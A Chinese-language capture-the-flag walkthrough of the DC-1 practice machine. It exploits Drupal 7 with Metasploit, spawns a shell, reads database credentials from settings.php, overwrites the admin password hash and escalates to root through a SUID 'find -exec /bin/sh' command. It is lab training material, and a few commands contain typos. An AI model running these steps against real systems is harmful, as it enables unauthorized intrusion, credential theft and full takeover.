DC-1
一.创建环境
1.在虚拟机里创建一个dc-1靶场 dc-1的主要作用是获得渗透测试领域的经验
2、下载靶场环境
靶场下载地址:
二.渗透靶场
本环境重在在于如下两个知识点
Drupal 7 漏洞利用
find 提权
1、目标:
目标就是我们搭建的靶场,靶场IP为:XXX.XXX.XXX.XXX/24
2、信息收集:寻找靶机真实IP
nmap -sP 1 XXX.XXX.XXX.XXX /24
扫描网段中有哪些主机在线,使用 -sP 参数,不扫描端口,只扫描「存活主机」。
本质上是Ping扫描,能Ping通有回包,就判定主机在线。
3、信息收集:探端口及服务
nmap -A -p- -v 192.168.52.129
-A 综合性扫描
-v 冗余模式。强烈推荐使用这个选项,它会给出扫描过程中的详细信息
发现开放了22端口,开放了ssh服务,OpenSSH 6.0p1
发现开放了80端口,存在web服务,Apache httpd 2.2.22,Drupal 7
发现开放了111端口,开放了rpcbind服务
访问web站点
4.发现是一个电信的drupal服务,根据nmap结果可知当前运行的是Drupal 7的CMS
searchsploit drupal 7
5.利用MSF渗透
典型的drupal,启动Metersploit MSF存在drupal模块,尝试使用msf渗透
1.MSF简单命令介绍
msfconsole 进入MSF控制台
search 搜索相应模块
use 对应模块
show options 查看信息
set RHOST 远程主机ip
run 攻击
3.进入MSF控制台搜索drupal模块
进入MSF控制台msfdb run
搜索drupal模块search drupal
6.选择模块进行测试
用2018的测试
- 设置靶机IP运行msf
8.执行whoami
发现是www-data权限
进入home目录,发现flag4.txt文件,提示需要提升权限
9.使用python反弹一个交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
显示了当前路径
10.发现flag1文件
查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件
11.发现flag2
Drupal的默认配置文件为
/var/www/sites/default/settings.php
查看文件内容
cat /var/www/sites/default/settings.php
发现了flag2和数据库的账号密码
flag2提示,提升权限为root来查看敏感文件
12.我们先进入数据库查看
'username' => 'dbuser',
'password' => 'R0ck3t',
mysql -u dbuser -p
查看数据库,切换到drupaldb数据库
13.查看查找默认的Drupal user 表
select * from users;
发现admin信息
解决方法:置换drupal密码
14.进入www目录
quit;
站点路径下执行
php scripts/password-hash.sh 123新密码
15.然后在进入数据库中把密码字段进行替换
进入mysql,输入密码,切换到drupaldb数据库
mysql -u dbuser -pR0ck3t
use drupaldb
将pass字段进行替换
update
usersset
pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where
name="admin";
然后再在pass=“引号前打上空格和vtt2w“前打上空格后在输入一次
16..登录站点
访问站点
进行登录,密码是之前我们自己替换的,账号是admin
admin
123
成功登录然后在浏览器中输入自己的测试ip192.168.52.129然后在下图中查找flag3然后查看信息
17.使用命令查看 suid 权限的可执行二进制程序
find / -perm -4000 2>/dev/null
发现find命令
18.使用命令测试,发现为root权限
touch 123
ls
find / -name 123 -exec "whoami" \;
19.发现最后的flag文件
我们切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。
find ./ -name 666 -exec "/bin/sh" \;
whoami
ls
cd /root
ls
查看cat thefinalflag.txt文件
cat thefinalflag.txt
看到上图也就代表基本完成